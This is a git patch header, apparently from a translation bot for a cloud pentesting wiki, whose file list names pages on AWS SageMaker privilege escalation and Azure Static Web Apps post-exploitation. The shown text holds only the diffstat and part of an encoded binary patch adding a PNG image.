From 14ef0d8f5fe34f4d69d852759bb4bf5dc56d6770 Mon Sep 17 00:00:00 2001
From: Translator <github-actions@github.com>
Date: Sun, 5 Jan 2025 22:57:50 +0000
Subject: [PATCH] Translated
 ['src/pentesting-cloud/aws-security/aws-privilege-escalation/

---
 src/images/azure_static_password.png          | Bin 0 -> 14369 bytes
 .../aws-sagemaker-privesc.md                  |  14 +-
 .../az-static-web-apps-post-exploitation.md   | 162 ++++++++++++++++++
 ...-conditional-access-policies-mfa-bypass.md |  46 ++---
 .../az-services/az-static-web-apps.md         | 109 ++++++++++++
 5 files changed, 301 insertions(+), 30 deletions(-)
 create mode 100644 src/images/azure_static_password.png
 create mode 100644 src/pentesting-cloud/azure-security/az-post-exploitation/az-static-web-apps-post-exploitation.md
 create mode 100644 src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md

diff --git a/src/images/azure_static_password.png b/src/images/azure_static_password.png
new file mode 100644
index 0000000000000000000000000000000000000000..9b11425160fdf4e9366904aff148498194333728
GIT binary patch
literal 14369
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
